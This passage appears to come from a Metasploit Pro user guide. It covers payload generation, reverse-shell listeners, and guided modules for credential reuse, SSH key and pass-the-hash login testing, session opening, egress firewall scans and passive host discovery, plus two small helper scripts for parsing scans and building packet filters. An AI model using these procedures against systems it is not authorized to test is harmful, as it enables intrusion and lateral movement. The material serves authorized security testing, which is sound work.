4. Click the Architecture dropdown button and select one of the available processor architecture types. The list of architecture types will vary based on the platform that you have selected. Some platforms, such as Android and AIX, will not have a platform.

From this point on, the steps will vary depending on the platform, architecture, and payload you have selected. Generally, you will need to specify the LHOST (reverse), LPORT, and RHOST (bind) that the payload uses, as well as the output options for the executable. You can also do things like encode the payload. For more information on payload options, see Classic Payload Options on page 246. For more information on output options, see Output Options on page 249. For more information on encoding options, see Encoding Options on page 249.

When you are ready to build the payload, click the Generate button. The Generate button will be active if all required options for the payload are configured.

If the payload generates without error, a window appears and alerts you that the payload has been generated and is ready for you to download. Click Download Now to automatically start the download process. If your browser is not configured to automatically download files, a dialog window will appear and prompt you to save or run the file. You will need to save the payload to your computer.


Listeners
A listener is the component that waits for an incoming connection from an exploited system. You must set up a listener if you intend to establish a connection between your Metasploit server and the exploited machine. For example, if you have delivered an executable to a target host, you will need to set up a listener to wait for a connection from it. When the host connects to the listener, a session opens on that machine, which enables you to interact with it to do things like collect evidence from the system.

In Metasploit Pro, you can set up persistent listeners, which continuously listen for connect backs from a compromised host. You can set up a persistent listener from the Global Settings area of the web interface. Each listener is bound to a specific project.

To set up a listener, you will need to define the listening host, listening port, and payload type. You can also assign a post-exploitation macro to the listener, so that when the exploited system connects back to the listener, Metasploit Pro runs the macro.

Setting Up a Listener
1. Select Administration > Global Settings.

2. Find the Persistent Listeners section.

3. Click the New Listener button.

4. When the Create a Listener form appears, specify the following:

- Associated project - Choose the project you want to use to access and manage open sessions.

- Listener payload - Choose the appropriate payload for the listener.

- Listener Address - Specify the IP address that you want the payload to connect back to (e.g., the IP address of the Metasploit server).

- Listener Port - Specify the port you set up for the handler when you generated the Windows Meterpreter Reverse TCP payload (e.g., 4444).

5. Save the listener.


Chapter 12: MetaModules

To learn more about MetaModules, read the following topics:

- About MetaModules on page 254
- Segmentation and Firewall Testing MetaModule on page 280
- Known Credentials Intrusion MetaModule on page 276
- Passive Network Discovery MetaModule on page 284
- Pass the Hash MetaModule on page 271
- Single Password Testing MetaModule on page 261
- SSH Key Testing MetaModule on page 267

About MetaModules
A MetaModule is a Metasploit Pro feature that provides a guided interface to walk you through a singular penetration testing task. Each MetaModule leverages the core functionality of a module, such as password testing or passive network discovery, but enables you to quickly configure and run the module with minimal setup.

Traditionally, in Metasploit Pro, there is quite a bit of manual configuration that you have to do in order to perform certain tasks. It requires knowledge of the various modules that are available in the Metasploit Framework and an understanding of how to configure and use them. This process can be daunting. This is where MetaModules come into the picture.

The best way to think of a MetaModule is as a module with a wizard. Like regular modules, MetaModules are prepackaged mini programs that you can run to perform a specific task, such as bruteforcing or scanning a target. Unlike modules, MetaModules guide you through their configuration. For example, most MetaModules need you to define the target scope, set up the test options, and generate a report.

MetaModules are added to and updated in Metasploit Pro regularly, so you should always grab the latest software update to get the newest MetaModules. To see all the latest MetaModules, select Modules > MetaModules from the Main Menu.


Tour of the MetaModules Overview Page

MetaModule Runs
Select Modules > MetaModules from the Main Menu. When the Overview page appears, click the View All button. The MetaModule Runs page appears.


From the MetaModules Runs page, you can view the findings for a MetaModule and delete a MetaModule run from the project.

MetaModule Findings
After you launch a MetaModule run, the Findings window appears and shows you the real-time statistics and the events for the MetaModule run.

The Findings window shows the following data:


l

Statistics - Shows real-time statistics for the MetaModule run. The information that the Findings window varies based on the MetaModule that is running. Task Log - Shows a detailed log of events for a MetaModule run.

You can click on the Statistics tab or the Task Log tab to switch between views on the Findings window.

MetaModule Findings
After a MetaModule completes its run, you can view the findings for the test from the MetaModule Runs page. The findings vary based on the MetaModule you choose to view. The following list describes the information that each MetaModule reports on the Findings window.
- Firewall Egress Test Findings - Shows the total number of open ports, closed ports, and filtered ports.

- Passive Network Discovery Findings - Shows the number of total packets captured, data captured, and hosts that were identified.

- Known Credentials Intrusion Findings - Shows the total number of hosts that the MetaModule attempted to authenticate and the number of sessions it was able to open.

- Pass the Hash Test Findings - Shows the total number of hosts that the MetaModule attempted to authenticate to, the total number of login attempts, and the total number of successful logins.


- Single Password Test Findings - Shows the total number of hosts that the MetaModule attempted to authenticate to, the total number of login attempts, and the total number of successful logins.

- SSH Key Test Findings - Shows the total number of hosts that the MetaModule attempted to authenticate to, the total number of login attempts, and the total number of successful logins.

Viewing the Findings for a MetaModule Run


To view the findings for a MetaModule run:

1. From within a project, select Modules > MetaModules.

2. Click on the View All Recently Launched MetaModules button.

3. Find the MetaModule run that you want to view the findings for.

4. Click Findings. The Findings window appears and shows you the results from the MetaModule run.

MetaModule Last Run Stats


Metasploit Pro displays the findings for the last MetaModule run at the top of the MetaModules Overview page.


To view the last run stats, select Modules > MetaModules from the Main Menu. The Overview page appears and shows the last run stats at the top of the page.

Stopping a MetaModule Run


You can stop a MetaModule run at any time. If you stop a MetaModule run before it finishes, it will not generate the report. However, any partial findings will be stored in the project. You can view the partial results from the Findings window.

1. Select Modules > MetaModules from the Main Menu.

2. Click the View All button to go to the MetaModules Run page.


3. Find the MetaModule run that you want to stop. It must have a Running status.

4. Click Stop. The status changes from Running to Aborted.

Deleting a MetaModule Run


Before you can delete a MetaModule run, you must have run at least one MetaModule. When you delete a MetaModule run, it removes the task from the MetaModule Runs page. It does not delete the sessions.

1. From within a project, select Modules > MetaModules.

2. Click on the View All Recently Launched MetaModules button.

3. Find the MetaModule run you want to delete.

4. Click Delete.


Single Password Testing MetaModule


The Single Password Testing MetaModule recycles a known credential pair to identify additional systems that can be authenticated. You can run this MetaModule to demonstrate how password reuse could expose major weaknesses in an enterprise's security posture. A single cracked password can enable you to easily compromise other systems that share the same password.

To use the Single Password Testing MetaModule, you need to provide it with a known credential pair that you've uncovered through a scan, bruteforce attack, or phishing attack. When you configure this MetaModule, you need to define the target hosts and the services that you want to attempt to authenticate. After the MetaModule completes its run, it generates a report that details the hosts on which it was able to authenticate the credentials.

Lockout Risks
An account lockout disables an account and prevents you from accessing the account for the duration of the lockout period. When you configure the Single Password Testing MetaModule, you should factor in the lockout risk for the services that you choose. Each service is categorized into the following lockout risks:
- Low Risk - Any service that typically does not enforce account lockouts, such as AFP, DB2, EXEC, FTP, HTTP, HTTPS, LOGIN, Oracle, Postgres, SHELL, SNMP, SSH_PUBKEY, Telnet, and VNC.

- Medium Risk - Any service that typically enforces account lockouts, such as MSSQL, MySQL, POP3, and SSH.

- High Risk - Any service that uses Windows authentication, such as PC Anywhere, SMB, vmauthd, and WinRM.

Running the Single Password Testing MetaModule


1. From within a project, select Modules > MetaModules.


2. Find the Single Password Testing MetaModule and click the Launch button. The Single Password Testing window appears.

3. From the Scope tab, enter the target address range you want to use for the test. The target address range must match the hosts in the workspace.


4. Click on the Services and Ports tab. The Services form appears.

5. Select the services that you want to attempt to authenticate. All services are categorized based on their lockout risk, which is the likelihood that the service enforces account lockouts.

6. Click on the Credentials tab. The Credentials form appears.

7. You can choose one of the following options to supply the MetaModule with credentials:


- Enter a known credential pair - You need to manually enter the user name and password combination that you want the MetaModule to use. Use this method for credentials obtained from phishing attacks.

- Choose an existing credential pair - You can select the user name and password combination from a list of known credentials. These credentials were obtained from a bruteforce attack, discovery scan, or data import.

8. Click the Report tab. The Report configuration form appears.


9. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name.

10. Select PDF, Word, RTF, or HTML for the report format.

11. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.

12. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses.

Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings.

13. Click the Launch button.

When the MetaModule launches, the Findings window appears and displays the real-time statistics and task log for the MetaModule run. You can track the total number of hosts that the MetaModule attempted to authenticate, the total number of login attempts, and the total number of successful logins. If you want to view all the event details, you can click on the Task Log tab.

After the MetaModule completes its run, you should go to the Reports area to view the Single Password Testing Report. The first few pages of the report show graphs and tables that provide a high-level breakdown of authenticated services and hosts. For a more detailed look at the compromised hosts, you can look at the Authenticated Services and Hosts Details section, which shows the services that were authenticated and the sessions that were opened on each host.


SSH Key Testing MetaModule


SSH public key authentication provides a secure method of logging in to a remote host. It uses an SSH key pair to authenticate a login instead of the traditional user name and password combination. The SSH key pair consists of a private and public SSH key. The private SSH key is stored on the local machine and enables you to log in to remote systems on which the corresponding public key is installed.

If you obtain an unencrypted SSH private key from a compromised target machine, you can run the SSH Key Testing MetaModule. This MetaModule enables you to bruteforce logins on a range of hosts to identify remote machines that can be authenticated with the private key.

During the MetaModule run, Metasploit Pro displays real-time statistics for the number of hosts targeted, the number of login attempts made, and the number of successful logins. After the MetaModule completes its run, it generates a complete report that provides the details for the hosts it was able to successfully authenticate.

Running the SSH Key Testing MetaModule


Before you can run the SSH Key Testing MetaModule, you must either have an SSH private key available that you can upload to your project, or your project must contain a looted SSH private key obtained from a scan, a bruteforce attack, or some other exploit method.

1. From within a project, select Modules > MetaModules.


2. Find the SSH Key Testing MetaModule and click the Launch button. The SSH Key Testing window appears.

3. From the Scope tab, enter the target address range you want to use for the test.

4. Click on the Credentials tab. The Credentials form appears.

5. Choose one of the following options to supply the MetaModule with an SSH private key:


- Enter a known credential pair - You need to manually enter the user name, and then browse to the location of the private key that you want the MetaModule to use.

- Choose an existing SSH key - You can select a user name and SSH key from a list of looted keys. These keys were obtained from a bruteforce attack, discovery scan, data import, or exploited system.

6. Click the Report tab. The Report configuration form appears.

7. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name.

8. Choose whether you want to generate the report as a PDF, HTML, or RTF file.


9. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.

10. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses.

Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings.

11. Click the Launch button.

When the MetaModule launches, the Findings window appears and displays the real-time statistics and task log for the MetaModule run. You can track the total number of hosts that the MetaModule attempted to authenticate, the total number of login attempts, and the total number of successful logins. If you want to view all the event details, you can click on the Task Log tab.

After the MetaModule completes its run, you should go to the Reports area to view the SSH Key Testing Report. The first few pages of the report show graphs and tables that provide a high-level breakdown of cracked hosts and services. For a more detailed look at the hosts, you can look at the Authenticated Services and Hosts Details section, which shows the services that were authenticated and the sessions that were opened on each host.


Pass the Hash MetaModule


Pass the hash is an attack method that attempts to use a looted password hash to authenticate to a remote system. It enables you to use a raw hash, which means that you do not need to crack the hash or know the plain text password. This attack method makes it very easy to compromise other machines that share the same credentials.

If you are able to obtain an NTLM password hash during your penetration test, you can run the Pass the Hash MetaModule. It attempts to use the Windows file and print sharing service, which operates over a protocol known as Server Message Block (SMB), to authenticate to other hosts in the network.

In order to run the Pass the Hash MetaModule, you must have a looted credential pair that consists of a raw NTLM hash and the associated user name. A password hash can be obtained from a compromised host by running evidence collection, by manually browsing a file system to locate the Security Accounts Manager (SAM), or by dumping the password hashes. Once you have a valid credential pair, you only need to specify the target hosts that you want the MetaModule to test the credentials against.

During the MetaModule run, Metasploit Pro displays real-time statistics for the number of hosts targeted, the number of login attempts made, and the number of successful logins. You can quickly identify the hosts that share the same login as the host from which you obtained the NTLM hash. You can leverage this information to move laterally across the network or to escalate your privileges to gain access to higher value machines.

When the MetaModule completes its run, it generates a complete report that provides the details for the hosts it was able to successfully authenticate. You can share this report with your organization to expose weak and shared passwords and to help mitigate vulnerabilities in its security infrastructure.

Running the Pass the Hash MetaModule


Before you can run the Pass the Hash MetaModule, you must either have a raw NTLM hash that you can manually input for the test, or your project must contain an NTLM hash looted from a compromised system.

1. From within a project, select Modules > MetaModules.


2. Find the Pass the Hash MetaModule and click the Launch button. The Pass the Hash window appears.

3. From the Scope tab, enter the target address range you want to use for the test in the Address Range field.

4. If there are any hosts that you want to blacklist from the test, click on the Advanced dropdown link and enter the addresses for those hosts in the Excluded Addresses field.

5. Click on the Credentials tab. The Credentials configuration form appears.

6. Choose one of the following options to supply the MetaModule with a raw NTLM hash:


- Enter a known credential pair - You need to manually enter the user name, and then enter the raw hash that you want the MetaModule to use. You should leave WORKGROUP as the domain name in order to authenticate to the local machine.

- Choose an existing SMB hash - You can select a user name and hash from a list of looted password hashes that are stored in the project.

7. Click the Generate Report tab. The Report configuration form appears.


8. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name.

9. Choose whether you want to generate the report as a PDF, HTML, or RTF file.

10. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.


11. From the Options area, select the Mask discovered passwords option if you want to obscure any password hashes that the report contains.

12. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses.

Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings.

13. Click the Launch button.

When the MetaModule launches, the Findings window appears and displays the real-time statistics and task log for the MetaModule run. You can track the total number of hosts that the MetaModule attempted to authenticate, the total number of login attempts, and the total number of successful logins. If you want to view all the event details, you can click on the Task Log tab.

After the MetaModule completes its run, you should go to the Reports area to view the Pass the Hash Report. The first few pages of the report show graphs and tables that provide a high-level breakdown of cracked hosts and services. For a more detailed look at the hosts, you can look at the Authenticated Services and Hosts Details section, which shows the services that were authenticated and the sessions that were opened on each host.


Known Credentials Intrusion MetaModule


The Known Credentials Intrusion MetaModule logs in to a list of specified services and attempts to open sessions on a range of hosts with the known credentials in the project. You can run this MetaModule if you want to quickly get shells on the hosts in your project.

In order to run the Known Credentials Intrusion MetaModule, the project must already contain credentials that you have collected from a Discovery Scan, bruteforce attack, or data import. The Known Credentials Intrusion MetaModule will attempt to authenticate to each service that has been enumerated for each host. If the MetaModule is able to successfully log in to the service, it attempts to open a session on the target, which you can use to do things like set up a VPN pivot, collect system data, or launch a shell to interact with the target system. It opens one session per target, and it moves on to the next host in the test if a session has already been established for a host.

During the MetaModule run, Metasploit Pro displays real-time statistics for the number of hosts targeted and the number of sessions opened. When the MetaModule completes its run, it generates a complete report that provides the details for the hosts on which it was able to open a session. You can share this report with your organization to expose weak passwords and to help mitigate vulnerabilities in its security infrastructure.

Running the Known Credentials Intrusion MetaModule


Before you can run the Known Credentials Intrusion MetaModule, you must run a Discovery Scan on the target network range or import existing host data. This populates the project with the necessary host information, such as open ports and services, that the MetaModule needs to run.

1. From within a project, select Modules > MetaModules.


2. Find the Known Credentials Intrusion MetaModule and click the Launch button. The Known Credentials Intrusion window appears.

3. From the Scope tab, enter the target address range you want to use for the test.


4. Click on the Payload tab to configure the payload settings.

5. Specify the following settings that you want to use for the payload:
- Payload type - Choose Meterpreter for Windows or Command shell for Linux systems.

- Connection - Choose one of the following connection types:

  - Auto - Automatically selects the payload type. In most cases, the Auto option selects the reverse shell payload because it is more likely to establish a connection between a target machine and the attacking machine.

  - Reverse - Select this option if the targets are behind a firewall or use NAT. Typically, a reverse shell payload will work for most situations.

  - Bind - Select this option if the target devices are unable to initiate a connection.

- Listener Ports - The port that you want the listener to listen on for incoming connections. By default, ports 1024-65535 are selected; however, you can define a specific port that you want the listener to use, such as 4444.

- Listener Host - The IP address that you want the target machine to connect back to. This is typically going to be the IP address of your local machine. If you do not specify a listener host, the MetaModule automatically uses the IP address of your local machine.

6. Click the Generate Report tab. The Report configuration form appears.

7. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name.

8. Choose whether you want to generate the report as a PDF, HTML, or RTF file.

9. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.

10. From the Options area, select the Mask discovered passwords option if you want to obscure any passwords that the report contains. The report replaces the password with **MASKED**. By default, this option is disabled. You should enable this option if you plan to distribute the report.

11. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses.

Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings.

12. Click the Launch button.


Segmentation and Firewall Testing MetaModule


When firewalls have badly configured or lax egress traffic filtering policies, they open the network up to attacks from reverse shells, data exfiltration, and other forms of exploitation. In order to identify the open ports that allow outbound traffic and to verify that your egress filtering policies properly block traffic, you can run the Segmentation and Firewall Testing MetaModule.

The MetaModule runs an Nmap SYN scan against an egress target to reveal the outbound ports that are open from an internal host. It identifies the state of the ports in your firewall based on the traffic received by the server. If the server receives the traffic, then the MetaModule flags the port as open. If the firewall blocks the traffic, the MetaModule flags the port as filtered. The MetaModule tags the remaining ports as unfiltered or closed depending on their response to connections.

After the MetaModule completes its run, it generates a report that provides you with a comprehensive look at port state distribution and unfiltered ports.

Egress Scan Target


The egress target, egadz.metasploit.com, is a server hosted by Rapid7 and has been set up to have all 65,535 ports open. Each port is configured to respond with a single SYN-ACK packet. In its default configuration, the MetaModule initiates a port scan using Nmap's default 1000 most common ports; however, if you need to include additional ports, you can define a custom port range.

Port States
The Segmentation and Firewall Testing MetaModule uses the following states to categorize ports.

Open
A port is assigned an open state if it allows traffic out of the network and the EGADZ server receives it. An open state indicates that there is an application that is actively accepting TCP connections, UDP datagrams or SCTP associations.

Filtered
A port is assigned a filtered state if it drops the traffic before it reaches the desired port on the EGADZ server. It will not receive a response from the EGADZ server. Typically, a port has a filtered state if a dedicated firewall device, router rules, or host-based firewall software has successfully blocked the port from sending traffic.


Closed
A port is assigned a closed state if it allows traffic through the port, but there is not an application or service bound to the port. A closed port can be used to determine if a host is up on an IP address.

Unfiltered
A port is assigned an unfiltered state if it allows traffic through to the port, but it cannot be determined whether the port is open or closed.

Running the Segmentation and Firewall Testing MetaModule


1. From within a project, select Modules > MetaModules.

2. Find the Segmentation and Firewall Testing MetaModule and click the Launch button.

The Segmentation and Firewall Testing configuration window appears.

3. From the Scan Config tab, choose one of the following scan target options:

- Use default egress target - The MetaModule runs against the egress server that Metasploit has set up for testing outbound traffic.

- Use a custom egress target - The MetaModule runs against a server that you have set up for testing outbound traffic. You can specify an IP or a fully qualified domain name. To learn how to set up a custom egress target, go to the Global Tools area located on the Projects page and download the Segmentation Target Setup Script. You can follow the instructions provided in the script to create a custom egress server.

4. From the Scan Config tab, choose one of the following port range options:

- Use default nmap port set - Scans Nmap's 1000 most common ports.

- Use a custom port range option - Scans the range of ports that you define.


5. Click the Generate Report tab. The Report configuration form appears.

6. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name.

7. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.

8. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses.

Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define mail server settings, select Administration > Global Settings > SMTP Settings.

9. Click the Launch button.
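The following script is an added example, not Metasploit Pro code: it parses Nmap grepable output from a SYN scan of an egress target that answers SYN-ACK on every port, computes the port state distribution described under Port States, and flags open or unfiltered ports that an egress policy does not allow. The scan lines, the address and hostname, and the allowed port set are constructed for this example.

```python
"""Summarize an egress (Segmentation and Firewall Testing style) Nmap SYN scan.

Added example, not Metasploit Pro code. It reads Nmap's grepable (-oG) output
for a SYN scan of an egress target on which every port answers with a SYN-ACK,
computes the port-state distribution the report charts, and lists ports that
let traffic out but are not part of an allowed egress policy. The scan lines
and the policy below are constructed; the address and hostname are placeholders.
"""
import re
from collections import Counter
from typing import Dict, List, Set, Tuple

# Constructed -oG output: one Host line, eight probed TCP ports.
SAMPLE_SCAN = (
    "# Nmap 6.40 scan initiated as: nmap -sS -oG - -p 22,25,53,80,443,445,3389,8080 "
    "egress-target.example\n"
    "Host: 198.51.100.10 (egress-target.example)\tPorts: "
    "22/filtered/tcp//ssh///, 25/filtered/tcp//smtp///, 53/open/tcp//domain///, "
    "80/open/tcp//http///, 443/open/tcp//https///, 445/filtered/tcp//microsoft-ds///, "
    "3389/closed/tcp//ms-wbt-server///, 8080/unfiltered/tcp//http-proxy///\n"
    "# Nmap done at ... -- 1 IP address (1 host up) scanned\n"
)

# Constructed policy: only DNS, HTTP and HTTPS may leave the network.
ALLOWED_EGRESS_TCP: Set[int] = {53, 80, 443}

# Each -oG Ports entry is port/state/protocol/owner/service/rpcinfo/version.
PORT_RE = re.compile(
    r"^(\d+)/(open\|filtered|closed\|filtered|open|closed|filtered|unfiltered)/(tcp|udp|sctp)/"
)


def parse_grepable(text: str) -> Dict[Tuple[int, str], str]:
    """Return {(port, protocol): state} for every Host line in -oG output."""
    states: Dict[Tuple[int, str], str] = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        # The Ports field ends at the next tab (e.g. before 'Ignored State:').
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(","):
            match = PORT_RE.match(entry.strip())
            if match:
                port, state, proto = match.groups()
                states[(int(port), proto)] = state
    return states


def state_distribution(states: Dict[Tuple[int, str], str]) -> Dict[str, int]:
    """Count ports per state, the distribution the MetaModule report charts."""
    return dict(Counter(states.values()))


def egress_violations(states: Dict[Tuple[int, str], str], allowed: Set[int]) -> List[int]:
    """TCP ports that reached the egress target but are not in the allowed policy.

    Because every port on the egress target answers SYN-ACK, 'open' means the
    SYN left the network and the answer came back, and 'unfiltered' means the
    probe was not dropped but its state could not be settled. Both are findings
    unless the policy allows the port. 'filtered' is the desired outcome for
    everything else, and 'closed' means the probe was answered (by a RST), but
    not by a listening service.
    """
    return sorted(
        port
        for (port, proto), state in states.items()
        if proto == "tcp" and state in ("open", "unfiltered") and port not in allowed
    )


def summarize(text: str, allowed: Set[int]) -> Dict[str, object]:
    """Parse a scan and return both the distribution and the policy violations."""
    states = parse_grepable(text)
    return {
        "distribution": state_distribution(states),
        "violations": egress_violations(states, allowed),
    }


if __name__ == "__main__":
    result = summarize(SAMPLE_SCAN, ALLOWED_EGRESS_TCP)
    print("port state distribution:", result["distribution"])
    print("ports open outbound but not allowed by policy:", result["violations"])
```

Run the script against the `-oG` output of a scan of your own custom egress target to compare the ports that actually leave the network with the ports your policy intends to allow.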


Passive Network Discovery MetaModule


A passive network scan stealthily monitors broadcast traffic to identify the IP addresses of hosts on the network. By initially running a passive scan, you can identify known hosts while evading network monitoring tools, such as intrusion detection systems (IDS). The data obtained from a passive network scan can be used to perform a targeted active scan with the Discovery Scan.

The Passive Network Discovery MetaModule runs a live packet capture on a network interface to capture DHCP requests and ARP requests. If you want to have more granular control over the packet capture or you want to reduce the size of the packet capture, you can use Berkeley Packet Filters (BPF) to specify the types of packets that the MetaModule captures. The packet capture runs until it reaches the maximum Pcap file size or the time limit you have configured for the MetaModule.

Running the Passive Network Discovery MetaModule


1. From within a project, select Modules > MetaModules.

2. Find the Passive Network Discovery MetaModule and click the Launch button. The Passive Network Discovery window appears.


3. From the Pcap Configuration tab, select the Network Interface Card (NIC) you want to use to capture traffic. Metasploit Pro automatically detects the interfaces that are available.

4. Use the sliders to define the following limits for the packet capture:

   - Timeout - The time limit for the capture, in seconds.
   - Max File Size - The maximum file size for each file captured, up to 512 MB.
   - Max Total Size - The maximum size of the entire Pcap file, up to 2 GB. This value must be larger than the Max File Size.

   Note: The packet capture runs until it meets the timeout limit or the maximum Pcap file size limit.

5. Click on the Filters tab. The Berkeley Packet Filters page appears.

6. Choose one of the following options, if you want to specify a BPF string:


   - Select Protocols from the following list - Choose this option if you want the MetaModule to automatically generate the BPF string based on the protocols and ports you have selected. The Passive Network Discovery MetaModule provides a list of the most common ports and services that you can choose from. After you select the protocols and ports for the BPF string, you can view the generated string at the bottom of the Filters page.

   - Manually enter a BPF string - Choose this option if you want to manually define the BPF string. For more information on BPF syntax, visit http://biot.com/capstats/bpf.html.
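The two configuration steps above (the capture limits in step 4 and the protocol-driven BPF string in step 6) can be checked before a capture is launched. The following Ruby is an added example written for this guide, not Metasploit Pro's own code: the protocol-to-primitive table, the way primitives are combined, and the limit-checking rules are assumptions chosen to illustrate the behaviour the guide describes (DHCP and ARP capture, a total size that must exceed the per-file size).

```ruby
# Added example (not Metasploit Pro code): build a Berkeley Packet Filter
# string from selected protocols and ports, and sanity-check capture limits.
# The protocol table and combination rules below are assumptions.

# Constructed lookup of common protocols and the BPF primitive for each.
PROTOCOL_PRIMITIVES = {
  'arp'   => 'arp',
  'dhcp'  => 'udp and (port 67 or port 68)',
  'dns'   => 'udp and port 53',
  'http'  => 'tcp and port 80',
  'https' => 'tcp and port 443',
  'smb'   => 'tcp and port 445',
}.freeze

# Build a BPF expression. `protocols` are keys of PROTOCOL_PRIMITIVES;
# `ports` are extra ports to capture in either direction. Unknown protocol
# names raise instead of silently widening the capture.
def build_bpf(protocols: [], ports: [])
  terms = []
  protocols.map(&:to_s).map(&:downcase).uniq.each do |name|
    primitive = PROTOCOL_PRIMITIVES.fetch(name) do
      raise ArgumentError, "unknown protocol: #{name}"
    end
    terms << "(#{primitive})"
  end
  ports.map(&:to_i).uniq.sort.each do |port|
    raise ArgumentError, "invalid port: #{port}" unless (1..65535).cover?(port)
    terms << "(port #{port})"
  end
  terms.join(' or ')
end

# Upper bounds from the guide: 512 MB per file, 2 GB total.
MAX_FILE_MB  = 512
MAX_TOTAL_MB = 2048

# Return a list of problems with the chosen limits (empty when consistent).
def capture_limit_problems(timeout_s:, max_file_mb:, max_total_mb:)
  problems = []
  problems << 'timeout must be positive' unless timeout_s.to_i > 0
  problems << "max file size exceeds #{MAX_FILE_MB} MB" if max_file_mb > MAX_FILE_MB
  problems << "max total size exceeds #{MAX_TOTAL_MB} MB" if max_total_mb > MAX_TOTAL_MB
  problems << 'max total size must be larger than max file size' unless max_total_mb > max_file_mb
  problems
end

if __FILE__ == $PROGRAM_NAME
  puts build_bpf(protocols: %w[arp dhcp], ports: [8080])
  p capture_limit_problems(timeout_s: 600, max_file_mb: 512, max_total_mb: 512)
end
```

The generated string for ARP plus DHCP is `(arp) or (udp and (port 67 or port 68))`, which matches the traffic the MetaModule captures by default; narrowing it this way keeps the Pcap small and reduces how much unrelated broadcast traffic ends up in the project.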


5. Click the Report tab. The Report configuration page appears.

6. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name.

7. Select whether you want to generate the report as a PDF, RTF, or HTML file.


8. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.

9. Select the Mask discovered passwords options if you want to hide discovered credentials from the report.

10. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses. Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings.


11. Click the Launch button. When the MetaModule launches, the Findings window appears. It contains the statistics and task log for the MetaModule run. You can track the total number of packets, bytes, and hosts that the MetaModule captures in real-time.

After the MetaModule completes its run, you should go to the Reports area to view the Passive Network Discovery Findings Report that the MetaModule generated. The report provides detailed information about the services and credentials that the MetaModule was able to capture for each host, as well as a graphical breakdown of the operating systems and services that were found.


MetaModule Reports
A report provides insight into an organization's security infrastructure. The goal of a report is to clearly convey the outcome of a penetration test to your readers. Each report in Metasploit Pro contains a high-level summary of results along with the technical details of the test. The report is organized into logical sections, which makes it easy to navigate and find key information. This is extremely useful in cases where you may need to share a single report across an organization.

Since the audience may be a mix of technical and non-technical readers, it is important that each report conveys data in a way that is useful and valuable to each type of reader. For example, senior management may want to quickly glance at the report, so a summary that visually relays the most significant information will most likely resonate the most with them. The IT or security teams, on the other hand, will be more interested in the technical details of the test, so they can mitigate any issues that were exposed by the test.

In Metasploit Pro, each MetaModule includes a specialized report. Each report contains information that is specific to the MetaModule that generates it. Each time you run a MetaModule, it automatically generates a report that details its findings. The data within each report represents a static snapshot of a target network and can be used as a benchmark to measure an organization's security posture. The following reports are available for MetaModules:

- Firewall Egress Testing Report
- Passive Network Discovery Report
- Known Credentials Intrusions Report
- Single Password Testing Report
- SSH Key Testing Report
- Pass the Hash Report

Generating a Report for a MetaModule


Reports can only be configured and generated from the MetaModule configuration window. Since the configuration of MetaModules varies depending on the one you have selected, the following steps provide a general overview of how to enable report generation for a MetaModule:

1. Select Modules > MetaModules from the Main Menu.

2. Find the MetaModule that you want to run and click Launch.


3. Click on the Generate Report tab.

4. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the MetaModule uses the default report name.

5. Choose whether you want to generate the report as a PDF, HTML, or RTF file.

6. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.

7. From the Options area, select the Mask discovered passwords option if you want to obscure any passwords that the report contains. The report replaces the password with **MASKED**. By default, this option is disabled. You should enable this option if you plan to distribute the report.

8. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses. Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings.

9. Configure the remaining options for the MetaModule, such as the scope of the test. When you are done, click the Launch button to run the MetaModule.

Firewall Egress Testing Report


The Firewall Egress Testing Report shows the distribution of critical and registered ports that were discovered. It also includes a detailed list of unfiltered and unregistered ports and an appendix that provides information about port states, services, and test results. You can view this report to quickly identify ports that allow outbound traffic and to determine whether or not your egress filtering policies work as intended.


ID. Report Section - Report Description

1. Title Page - The front page of the report. It includes the Rapid7 logo, product name, and a brief description of the report contents.

2. Project Summary - Lists the project name and the user who generated the report.

3. Egress Summary - Lists the egress scan target used, port range scanned, and the run time for the test.

4. Port State Distribution - Shows a graphical breakdown of the critical and registered ports that are opened, filtered, and closed. If no data is available, then the report does not show a graph.

